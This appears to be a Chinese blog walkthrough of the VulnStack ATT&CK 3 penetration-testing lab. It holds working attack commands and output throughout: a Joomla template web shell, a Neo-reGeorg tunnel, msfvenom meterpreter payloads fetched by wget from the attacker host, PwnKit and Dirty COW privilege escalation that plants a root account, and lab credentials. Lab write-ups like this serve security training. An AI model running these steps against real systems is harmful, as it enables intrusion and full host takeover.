VulnStack-ATT&CK-3_vulnstack 3-程序员宅基地
技术标签: python 网络 系统安全 运维 linux 服务器 VulnStack-ATT(红日综合靶场) 网络安全
红日靶场三
一、信息收集
1、获取目标地址
┌──(root㉿kali)-[/home/sword]
└─# nmap -sn 192.168.88.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2023-11-11 14:26 CST
#本机地址
Nmap scan report for 192.168.88.1
Host is up (0.00032s latency).
#DHCP
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.88.2
Host is up (0.000081s latency).
MAC Address: 00:50:56:E8:BB:DF (VMware)
Nmap scan report for 192.168.88.147
Host is up (0.00013s latency).
#网关
MAC Address: 00:0C:29:32:46:C9 (VMware)
Nmap scan report for 192.168.88.254
Host is up (0.000047s latency).
#kali
MAC Address: 00:50:56:ED:66:29 (VMware)
Nmap scan report for 192.168.88.140
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.04 seconds
2、获取端口
┌──(root?kali)-[/home/sword]
└─# nmap -sS 192.168.88.147
Starting Nmap 7.92 ( https://nmap.org ) at 2023-11-11 14:29 CST
Nmap scan report for 192.168.88.147
Host is up (0.000056s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
MAC Address: 00:0C:29:32:46:C9 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
3、Nessus扫描
4、AWVS扫描WBE服务
5、nmap扫描
┌──(root㉿kali-3)-[/opt/awvs]
└─# nmap --script=vuln 192.168.88.147
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-11 16:38 CST
Nmap scan report for 192.168.88.147
Host is up (0.000067s latency).
Not shown: 997 closed tcp ports (reset)
#存在的端口
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
#可能存在csrf
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.88.147
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.88.147:80/
| Form id: mod-search-searchword87
| Form action: /index.php
|
| Path: http://192.168.88.147:80/index.php/5-your-modules
| Form id: mod-search-searchword87
| Form action: /index.php
|
| Path: http://192.168.88.147:80/index.php/3-welcome-to-your-blog
| Form id: mod-search-searchword87
| Form action: /index.php
|
| Path: http://192.168.88.147:80/index.php
| Form id: mod-search-searchword87
| Form action: /index.php
|
| Path: http://192.168.88.147:80/index.php/about
| Form id: mod-search-searchword87
| Form action: /index.php/about
|
| Path: http://192.168.88.147:80/index.php/4-about-your-home-page
| Form id: mod-search-searchword87
| Form action: /index.php
|
| Path: http://192.168.88.147:80/index.php/6-your-template
| Form id: mod-search-searchword87
|_ Form action: /index.php
| http-dombased-xss:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.88.147
| Found the following indications of potential DOM based XSS:
|
| Source: window.open(this.href,'win2','status=no,toolbar=no,scrollbars=yes,titlebar=no,menubar=no,resizable=yes,width=640,height=480,directories=no,location=no')
|_ Pages: http://192.168.88.147:80/, http://192.168.88.147:80/, http://192.168.88.147:80/, http://192.168.88.147:80/, http://192.168.88.147:80/index.php/5-your-modules, http://192.168.88.147:80/index.php/3-welcome-to-your-blog, http://192.168.88.147:80/index.php, http://192.168.88.147:80/index.php, http://192.168.88.147:80/index.php, http://192.168.88.147:80/index.php, http://192.168.88.147:80/index.php/about, http://192.168.88.147:80/index.php/4-about-your-home-page, http://192.168.88.147:80/index.php/6-your-template
#CMS是Joomla
| http-enum:
| /administrator/: Possible admin folder
| /administrator/index.php: Possible admin folder
| /robots.txt: Robots file
| /administrator/manifests/files/joomla.xml: Joomla
#Joomla的版本
version 3.9.12
| /language/en-GB/en-GB.xml: Joomla version 3.9.12
| /htaccess.txt: Joomla!
| /README.txt: Interesting, a readme.
| /bin/: Potentially interesting folder
| /cache/: Potentially interesting folder
| /images/: Potentially interesting folder
| /includes/: Potentially interesting folder
| /libraries/: Potentially interesting folder
| /modules/: Potentially interesting folder
| /templates/: Potentially interesting folder
|_ /tmp/: Potentially interesting folder
3306/tcp open mysql
#存在爆破
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:32:46:C9 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 74.13 seconds
5、信息分析
80:http服务寻找WEB漏洞
22:ssh服务可以进行爆破
3306:数据库可以镜像爆破或者提权
XSS:目前这种情况不太能拿下shell,放到最后考虑
可浏览目录:并没又太多信息
备份文件泄露:也并没发现什么泄露
SSRF:可能存在
Nginx版本低于1.17
获取到WEB网站后台登陆界面:可以进行爆破
发现通过远程访问主机访问的robots.txt
使用的有个joomla的CMS
配置信息泄露:找到了当前数据库名、账号、密码
6、有用信息归集
#数据库
账号:testuser
密码:cvcvgjASD!@
当前数据库名:joomla
#绝对路径
/usr/sbin/sendmail
/var/www/html/administrator/logs
/var/www/html/tmp
#一个邮箱地址
[email protected]
#CMS
名字:Joomla
版本:3.9.12
#可能存在SSRF
#可能存在CSRF
#WEB后台地址
http://192.168.88.147/administrator/index.php
二、登陆WEB后台
1、查询JOOMLA官方文档
Joomla!1.5密码恢复:
https://docs.joomla.org/How_do_you_recover_or_reset_your_admin_password%3F/zh-cn
发现了它加密的密码和明文密码
2、修改后台密码
3、登陆后台
4、插入一句话木马
本来准备上工具开扫的,结果在找上传点的时候发现了编辑器
编辑器位置:
http://192.168.88.147/administrator/index.php?option=com_templates&view=template&id=503&file=L2luZGV4LnBocA
5、连接一句话
发现并不能连接说明,路径错了
猜测administrator/index.php
前面不是获取了两个绝对路径吗?拿过来分析
突然发现这里的信息
继续尝试
但是发现命令界面用不了
6、查看PHPINFO
创建一个php文件
访问info.php,发现命令执行被禁用了
三、绕过disable_functions
1、蚁剑插件
2、选择模式
3、上传代理脚本
4、查询信息
发现192.168.93.0/24网段
四、Neo-reGeorg
1、工具下载
https://github.com/L-codes/Neo-reGeorg.githttps://github.com/L-codes/Neo-reGeorg- 中文说明:
https://github.com/L-codes/Neo-reGeorg/blob/master/README.md
2、生成PHP脚本
#查看工具
┌──(root㉿kali-3)-[/home/sword]
└─# ls
144 Pictures drupal.sql pass.txt
192.168.88.144 PrivescCheck frp_0.52.3_linux_amd64 pingtunnel_linux_amd64.zip
Desktop PrivescCheck-master.zip frp_0.52.3_linux_amd64.tar.gz shell
Documents Public fscan_amd64 shell.elf
Downloads Templates linux_amd64_client.tar.gz top500.txt
Music Videos linux_amd64_server.tar.gz web
Neo-reGeorg-master centos2.elf myshadow
Neo-reGeorg-master.zip conf nps
#进入工具目录
┌──(root㉿kali-3)-[/home/sword]
└─# cd Neo-reGeorg-master
#生成代理脚本密码是sword
┌──(root㉿kali-3)-[/home/sword/Neo-reGeorg-master]
└─# python neoreg.py generate -k sword
[+] Mkdir a directory: neoreg_servers
[+] Create neoreg server files:
=> neoreg_servers/tunnel.ashx
=> neoreg_servers/tunnel.jspx
=> neoreg_servers/tunnel.jsp
=> neoreg_servers/tunnel.aspx
=> neoreg_servers/tunnel.php
=> neoreg_servers/tunnel.go
#查看
┌──(root㉿kali-3)-[/home/sword/Neo-reGeorg-master]
└─# ls
CHANGELOG-en.md CHANGELOG.md LICENSE README-en.md README.md neoreg.py neoreg_servers templates
#进入生成代理文件夹
┌──(root㉿kali-3)-[/home/sword/Neo-reGeorg-master]
└─# cd neoreg_servers
#开启http服务
┌──(root㉿kali-3)-[/home/sword/Neo-reGeorg-master/neoreg_servers]
└─# python -m http.server 1000
Serving HTTP on 0.0.0.0 port 1000 (http://0.0.0.0:1000/) ...
访问:
kaliIP:1000/tunnel.php下载代理文件
3、连接代理服务
上传代理脚本
连接代理
#切换到上一级目录
┌──(root㉿kali-3)-[/home/sword/Neo-reGeorg-master/neoreg_servers]
└─# ../ #连接代理
┌──(root㉿kali-3)-[/home/sword/Neo-reGeorg-master]
└─# python neoreg.py -k sword -u http://192.168.88.147/templates/beez3/tunnel.php -l 0.0.0.0 -p 1080
"$$$$$$'' 'M$ '$$$@m
:$$$$$$$$$$$$$$''$$$$'
'$' 'JZI'$$& $$$$'
'$$$ '$$$$
$$$$ J$$$$'
m$$$$ $$$$,
$$$$@ '$$$$_ Neo-reGeorg
'1t$$$$' '$$$$<
'$$$$$$$$$$' $$$$ version 5.1.0
'@$$$$' $$$$'
'$$$$ '$$$@
'z$$$$$$ @$$$
r$$$ $$|
'$$v c$$
'$$v $$v$$$$$$$$$#
$$x$$$$$$$$$twelve$$$@$'
@$$$@L ' '<@$$$$$$$$`
$$ '$$$
[ Github ] https://github.com/L-codes/Neo-reGeorg
+------------------------------------------------------------------------+
Log Level set to [ERROR]
Starting SOCKS5 server [0.0.0.0:1080]
Tunnel at:
http://192.168.88.147/templates/beez3/tunnel.php
+------------------------------------------------------------------------+
#-l :指定主机(谁能访问代理)
#-p:指这个代理开启需要动用的端口
#-u:代表代理脚本的地址
#-k:指制作这个脚本的约定密码
4、测试连接
设置代理端口,可以直接访问
五、生成正向连接木马
1、生成木马
#生成正向连接木马
┌──(root㉿kali-3)-[/home/sword]
└─# msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=4444 -f elf > msfshell.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 78 bytes
Final size of elf file: 198 bytes
2、上传木马
3、运行木马并开启监听
运行木马
kali连接
#设置全局网络
msf6 > setg proxies socks5:127.0.0.1:1080
proxies => socks5:127.0.0.1:1080
#查看
msf6 > setg
Global
======
Name Value
---- -----
proxies socks5:127.0.0.1:1080
开启监听
#进入监听模块
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
#设置正向连接payload
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/bind_tcp
payload => linux/x64/meterpreter/bind_tcp
#设置连接端口
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
#设置目标主机
msf6 exploit(multi/handler) > set rhost 192.168.93.120
rhost => 192.168.93.120
msf6 exploit(multi/handler) >
查看参数
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (linux/x64/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST 192.168.93.120 no The target address
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > run
4、连接成功
#运行模块
msf6 exploit(multi/handler) > run
[*] Started bind TCP handler against 192.168.93.120:4444
[*] Sending stage (3045348 bytes) to 192.168.93.120
[*] Meterpreter session 1 opened (127.0.0.1:39619 -> 127.0.0.1:1080) at 2023-11-13 14:32:16 +0800
#查询当前用户
meterpreter > getuid
Server username: www-data
#查看网卡
meterpreter > ipconfig
Interface 1
============
Name : lo
Hardware MAC : 00:00:00:00:00:00
MTU : 65536
Flags : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::
Interface 2
============
Name : ens33
Hardware MAC : 00:0c:29:02:ee:33
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.93.120
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::20c:29ff:fe02:ee33
IPv6 Netmask : ffff:ffff:ffff:ffff::
六、尝试提权
1、本地漏洞利用
#寻找关于本地漏洞利用的建议或相关信息
msf6 post(multi/recon/local_exploit_suggester) > search suggest
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
#建立一个监听器,接收通过 ICMP 协议进行隐蔽传输的数据
0 auxiliary/server/icmp_exfil normal No ICMP Exfiltration Service
#利用 Internet Explorer(IE)浏览器中的 MS10-018 漏洞
1 exploit/windows/browser/ms10_018_ie_behaviors 2010-03-09 good No MS10-018 Microsoft Internet Explorer DHTML Behaviors Use After Free
#用于自动分析本地系统信息,并尝试找到可能的本地漏洞利用建议
2 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
#用于扫描目标主机是否存在 Nagios XI 系统,并尝试发现可能的漏洞
3 auxiliary/scanner/http/nagios_xi_scanner normal No Nagios XI Scanner
#用于在受感染的 macOS 系统上收集有关 Colloquy IRC 客户端的信息
4 post/osx/gather/enum_colloquy normal No OS X Gather Colloquy Enumeration
#可以利用Sonic Pi的功能来执行各种任务,如远程执行代码、创建和播放音乐等
5 post/osx/manage/sonic_pi normal No OS X Manage Sonic Pi
#用于利用SharePoint服务器上的数据反序列化漏洞
6 exploit/windows/http/sharepoint_data_deserialization 2020-07-14 excellent Yes SharePoint DataSet / DataTable Deserialization
#用于利用 Timbuktu 远程控制软件中的一个缓冲区溢出漏洞
7 exploit/windows/smb/timbuktu_plughntcommand_bof 2009-06-25 great No Timbuktu PlughNTCommand Named Pipe Buffer Overflow
2、使用扫描模块
之前把session填了
#进入模块2
msf6 post(multi/recon/local_exploit_suggester) > use 2
#查看必要参数
msf6 post(multi/recon/local_exploit_suggester) > show options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
View the full module info with the info, or info -d command.
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 192.168.93.120 - Collecting local exploits for x64/linux...
3、分析扫描结果
#用于利用 Linux 系统中的 BPF(Berkeley Packet Filter)组件的签名扩展漏洞进行本地提权
1 exploit/linux/local/bpf_sign_extension_priv_esc Yes The target appears to be vulnerable.
#用于利用 Linux 内核中 OverlayFS 组件中的漏洞 CVE-2021-3493 进行本地提权
2 exploit/linux/local/cve_2021_3493_overlayfs Yes The target appears to be vulnerable.
#用于利用 Linux 操作系统中的 CVE-2021-4034 漏洞进行本地提权
3 exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec Yes The target is vulnerable.
#允许拥有局部访问权限的恶意用户利用内核封装的 inotify 接口来修改 watch_queue 文件,从而实现提权
4 exploit/linux/local/cve_2022_0995_watch_queue Yes The target appears to be vulnerable.
#用于利用 Linux 系统中 GNU C 库(glibc)中的 realpath 函数漏洞进行本地提权
5 exploit/linux/local/glibc_realpath_priv_esc Yes The target appears to be vulnerable.
#可能是用于利用 Linux 中 pkexec 工具的特定漏洞
6 exploit/linux/local/pkexec Yes The service is running, but could not be validated.
#用于利用 Linux 系统中的 ptrace_traceme 和 pkexec_helper 漏洞进行本地提权
7 exploit/linux/local/ptrace_traceme_pkexec_helper Yes The target appears to be vulnerable.
#用于利用 Linux 系统中的 su(切换用户)命令进行本地提权
8 exploit/linux/local/su_login Yes The target appears to be vulnerable.
#用于利用 Linux 系统中 sudo 命令的 "baron samedit" 漏洞进行本地提权
9 exploit/linux/local/sudo_baron_samedit Yes The target appears to be vulnerable. sudo 1.8.16 is a vulnerable build.
4、尝试使用exp提权
#使用第一个exp
msf6 > use exploit/linux/local/bpf_sign_extension_priv_esc
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
#查看必要参数
msf6 exploit(linux/local/bpf_sign_extension_priv_esc) > show options
Module options (exploit/linux/local/bpf_sign_extension_priv_esc):
Name Current Setting Required Description
---- --------------- -------- -----------
COMPILE Auto yes Compile on target (Accepted: Auto, True, False)
SESSION yes The session to run this module on
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.88.141 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Auto
View the full module info with the info, or info -d command.
#写入session
msf6 exploit(linux/local/bpf_sign_extension_priv_esc) > set session 1
session => 1
#更换为正向连接
msf6 exploit(linux/local/bpf_sign_extension_priv_esc) > set payload linux/x64/meterpreter/bind_tcp
payload => linux/x64/meterpreter/bind_tcp
#再次查看必要参数
msf6 exploit(linux/local/bpf_sign_extension_priv_esc) > show options
Module options (exploit/linux/local/bpf_sign_extension_priv_esc):
Name Current Setting Required Description
---- --------------- -------- -----------
COMPILE Auto yes Compile on target (Accepted: Auto, True, False)
SESSION 1 yes The session to run this module on
Payload options (linux/x64/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address
Exploit target:
Id Name
-- ----
0 Auto
View the full module info with the info, or info -d command.
#写入监听端口
msf6 exploit(linux/local/bpf_sign_extension_priv_esc) > set lport 5555
lport => 5555
msf6 exploit(linux/local/bpf_sign_extension_priv_esc) > set RHOST 192.168.93.120
RHOST => 192.168.93.120
msf6 exploit(linux/local/bpf_sign_extension_priv_esc) > run
未提权成功,尝试下一个
5、提权成功
#进入模块
msf6 exploit(linux/local/bpf_sign_extension_priv_esc) > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
#正向连接
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set payload linux/x64/meterpreter/bind_tcppayload => linux/x64/meterpreter/bind_tcp
#目标IP地址
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set RHOST 192.168.93.120
RHOST => 192.168.93.120
#选择会话
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set session 1
session => 1
#监听端口
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set lport 5555
lport => 5555
#查看必要项
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > show options
Module options (exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec):
Name Current Setting Required Description
---- --------------- -------- -----------
PKEXEC_PATH no The path to pkexec binary
SESSION yes The session to run this module on
WRITABLE_DIR /tmp yes A directory where we can write files
Payload options (linux/x64/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 5555 yes The listen port
RHOST 192.168.93.120 no The target address
Exploit target:
Id Name
-- ----
0 x86_64
#启用模板
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.nxhlui
[+] The target is vulnerable.
[*] Writing '/tmp/.wusswgecmezg/tfahzw/tfahzw.so' (496 bytes) ...
[!] Verify cleanup of /tmp/.wusswgecmezg
[*] Started bind TCP handler against 192.168.93.120:5555
[*] Sending stage (3045348 bytes) to 192.168.93.120
[*] Meterpreter session 3 opened (127.0.0.1:46813 -> 127.0.0.1:1080) at 2023-11-13 20:08:28 +0800
#查询权限
meterpreter > getuid
Server username: root
七、内网横向渗透
1、可疑文件
#查看
meterpreter > ls
Listing: /root
==============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100600/rw------- 1271 fil 2023-11-11 23:15:00 +0800 .bash_history
100644/rw-r--r-- 3106 fil 2015-10-23 01:15:21 +0800 .bashrc
040700/rwx------ 4096 dir 2023-11-10 12:10:05 +0800 .cache
040750/rwxr-x--- 4096 dir 2023-11-13 21:19:50 +0800 .config
040700/rwx------ 4096 dir 2023-11-13 21:20:00 +0800 .gnupg
100600/rw------- 161 fil 2019-10-19 20:49:12 +0800 .mysql_history
040755/rwxr-xr-x 4096 dir 2023-11-10 12:06:40 +0800 .nano
100644/rw-r--r-- 148 fil 2015-08-17 23:30:33 +0800 .profile
100600/rw------- 1308 fil 2023-11-10 12:15:39 +0800 .viminfo
100755/rwxr-xr-x 6217056 fil 2023-11-13 20:18:21 +0800 fscan
040755/rwxr-xr-x 4096 dir 2023-11-10 12:15:39 +0800 mysql
100644/rw-r--r-- 309 fil 2023-11-13 20:20:29 +0800 result.txt
#进入
meterpreter > cd mysql
#查看
meterpreter > ls
Listing: /root/mysql
====================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100644/rw-r--r-- 38 fil 2023-11-10 12:15:39 +0800 test.txt
#查看
meterpreter > cat test.txt
adduser wwwuser
passwd wwwuser_123Aqx
2、尝试连接SSH
说明只能在内网登陆
3、连接ssh
说key不兼容
┌──(root㉿kali-3)-[/home/sword]
└─# proxychains ssh [email protected]
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.93.100:22 ... OK
Unable to negotiate with 127.0.0.1 port 1080: no matching host key type found. Their offer: ssh-rsa,ssh-dss
#连接ssh
┌──(root㉿kali-3)-[/home/sword]
└─# proxychains ssh -oHostKeyAlgorithms=+ssh-dss [email protected]
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.93.100:22 ... OK
\350\255\246\345\221\212\357\274\232\350\257\245\346\234\215\345\212\241\345\231\250\345\217\252\345\205\201\350\256\270\345\206\205\347\275\221\347\231\273\345\275\225\357\274\201
[email protected]'s password:
Last login: Tue Sep 26 11:52:09 2023
[wwwuser@localhost ~]$
-oHostKeyAlgorithms=+ssh-dss:这是OpenSSH的一个参数选项,用于指定允许使用的主机密钥认证算法。在这里,+ssh-dss表示添加ssh-dss算法以允许其用于主机密钥认证
4、生成木马
这里我新开了一个窗口
#生成木马
┌──(root㉿kali-3)-[/home/sword/shell]
└─# msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.88.141 LPORT=5555 -f elf > msfshell.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of elf file: 250 bytes
#开启http服务
┌──(root㉿kali-3)-[/home/sword/shell]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
5、下载木马
#下载
[wwwuser@localhost ~]$ wget http://192.168.88.141/msfshell.elf
--2023-11-14 05:42:56-- http://192.168.88.141/msfshell.elf
Connecting to 192.168.88.141:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 250 [application/octet-stream]
Saving to: “msfshell.elf.1”
100%[=======================================================================================>] 250 --.-K/s in 0s
2023-11-14 05:42:56 (80.5 MB/s) - “msfshell.elf.1” saved [250/250]
#赋予权限
[wwwuser@localhost ~]$ chmod +x msfshell.elf
6、MSF上线
开启监听
运行木马
八、Nginx服务提权
1、漏洞扫描
和上面一样
2、扫描结果分析
#利用 glibc 中的 "origin expansion" 功能,允许攻击者在受影响的系统上提升特权
1 exploit/linux/local/glibc_origin_expansion_priv_esc Yes The target appears to be vulnerable.
#允许本地攻击者以提升特权的方式执行恶意代码
2 exploit/linux/local/rds_rds_page_copy_user_priv_esc Yes The target appears to be vulnerable.
#利用 Linux 系统上的 su(切换用户)命令中的本地特权升级漏洞
3 exploit/linux/local/su_login Yes The target appears to be vulnerable.
3、尝试利用漏洞
测试了三个,都失败了
4、linpeas工具扫描
kali开启http访问
#开启http
┌──(root㉿kali-3)-[/home/sword]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.88.147 - - [14/Nov/2023 11:40:07] "GET /linpeas.sh HTTP/1.0" 200 -
下载工具
[wwwuser@localhost ~]$ wget http://192.168.88.141/linpeas.sh
--2023-11-14 06:40:04-- http://192.168.88.141/linpeas.sh
Connecting to 192.168.88.141:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 847815 (828K) [text/x-sh]
Saving to: “linpeas.sh”
100%[=======================================================================================>] 847,815 --.-K/s in 0.004s
2023-11-14 06:40:04 (195 MB/s) - “linpeas.sh” saved [847815/847815]
#赋予权限
[wwwuser@localhost ~]$ chmod +x linpeas.sh
5、分析结果
扫描出的CVE漏洞
6、尝试提权
使用
CVE-2016-5195
#编译
[wwwuser@localhost ~]$ gcc -pthread 40611.c -o dirtyc0w
#查看编译成功与否
[wwwuser@localhost ~]$ ls
1 40611.c dirtyc0w linpeas.sh msfshell.elf
利用exp,最后并没有把内容写入进文件,最终宣告失败
#吸入内容
[wwwuser@localhost ~]$ echo this is not a test > foo
#赋予权限
[wwwuser@localhost ~]$ chmod 0404 foo
#查看权限
[wwwuser@localhost ~]$ ls -lah foo
-r-----r--. 1 wwwuser wwwuser 19 Nov 14 07:01 foo
#编译
[wwwuser@localhost ~]$ gcc -pthread 40611.c -o dirtyc0w
#运行并带上参数
[wwwuser@localhost ~]$ ./dirtyc0w foo m00000000000000000
mmap 7f7ff87dd000
madvise 0
procselfmem -100000000
#查看是否写入内容
[wwwuser@localhost ~]$ cat foo
this is not a test
7、利用EXP脏牛2
利用
CVE-2016-5195
#编译
[wwwuser@localhost ~]$ gcc -pthread 40839.c -o dirty -lcrypt
#运行
[wwwuser@localhost ~]$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
#设置密码
Please enter the new password:
Complete line:
firefart:fiwT1NU1Krrig:0:0:pwned:/root:/bin/bash
mmap: 7f7822fb8000
madvise 0
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'sword'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
查看账号和密码
[wwwuser@localhost ~]$ cat /etc/passwd
firefart:fiwT1NU1Krrig:0:0:pwned:/root:/bin/bash
/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
nginx:x:498:498:nginx user:/var/cache/nginx:/sbin/nologin
wwwuser:x:500:500::/home/wwwuser:/bin/bash
8、提权成功
连接ssh
#退出当前ssh
[wwwuser@localhost ~]$ exit
logout
Connection to 192.168.93.100 closed.
#连接ssh
┌──(root㉿kali-3)-[/home/sword]
└─# proxychains ssh -oHostKeyAlgorithms=+ssh-dss [email protected]
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.93.100:22 ... OK
\350\255\246\345\221\212\357\274\232\350\257\245\346\234\215\345\212\241\345\231\250\345\217\252\345\205\201\350\256\270\345\206\205\347\275\221\347\231\273\345\275\225\357\274\201
#输入密码
[email protected]'s password:
Last login: Tue Sep 26 14:06:04 2023
#查看权限
[firefart@localhost ~]# id
uid=0(firefart) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[firefart@localhost ~]#
温馨提示:
这个账号
firefart的密码,解释你运行脏牛2的EXP时输入的密码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
智能推荐
vue-cli2,vue-cli3(vue脚手架)超详细教程_vue2+cli3-程序员宅基地
文章浏览阅读3.8k次,点赞33次,收藏30次。文章目录vue-cli脚手架Node.js环境安装vue-cli的安装npm,cnpm介绍安装脚手架用脚手架生成项目目录vue-cli脚手架顾名思义,脚手架就是用来协助,配合,帮助构建一个项目的。使用vue-cli仅需5分钟就可以搭建一个完整的Vue.js应用,相较于人工操作,具有安全,高效的特点。vue-cli与平台无关,功能更加齐全。无论是预编译模板,注入依赖,还是模拟生产环境等功能,vue-cli都具备,而且占用内存少,更高效,运行速度非常快。Node.js环境安装要安装Vue.js脚手架_vue2+cli3
华为OD机试 - 最小循环子数组(Java & JS & Python & C)-程序员宅基地
文章浏览阅读2.6k次,点赞4次,收藏13次。已支持(Java & JS & Python & C),考察:KMP算法,前缀表,最长相同前后缀,最小重复子串问题_最小循环子数组
oracle 入门_Oracle Container Cloud服务入门-程序员宅基地
文章浏览阅读254次。oracle 入门 Oracle容器云服务是Oracle进入托管容器服务世界的入口。 现有很多选项: 适用于AWS或Azure的Docker 亚马逊弹性容器服务 Google容器引擎 Azure容器服务 Mesosphere的DC / OS 红帽OpenShift 该博客将说明如何开始使用Oracle Container Cloud Service。 从托管容器..._oracle container
2023年蓝桥杯C++A组第三题:更小的数(双指针解法)
小蓝有一个长度均为 n 且仅由数字字符 0 ∼ 9 组成的字符串,下标从 0 到 n − 1,你可以将其视作是一个具有 n 位的十进制数字 num,小蓝可以从 num 中选出一段连续的子串并将子串进行反转,最多反转一次。小蓝想要将选出的子串进行反转后再放入原位置处得到的新的数字 numnew 满足条件 numnew < num,请你帮他计算下一共有多少种不同的子串选择方案,只要两个子串在 num 中的位置不完全相同我们就视作是不同的方案。
jsp,el表达式,foreach循环_el表达式 循环-程序员宅基地
